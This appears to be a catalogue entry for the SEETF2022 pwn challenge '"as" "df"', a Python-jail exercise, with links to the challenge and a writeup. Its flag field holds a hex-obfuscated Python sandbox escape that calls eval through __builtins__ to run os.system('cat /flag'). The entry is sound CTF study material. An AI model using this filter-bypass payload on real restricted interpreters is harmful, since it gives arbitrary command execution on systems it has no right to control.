| ID: | 1872 |
|---|---|
| 标题: | "as" "df" |
| 描述: | Author : TheMythologist Category : pwn Description Why use a python interpreter when there are online ones? Difficulty Medium |
| 类型: | PWN |
| 网站: | bugku |
| 题目链接: | https://ctf.bugku.com/challenges/detail/id/2017.html |
| 赛事: | SEETF2022 |
| 年度: | 2022 |
| Flag值: | print(__builtins__.__dict__['\x65\x76\x61\x6C']('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x22\x29')) |
| writeup: | https://ctftime.org/writeup/34146 |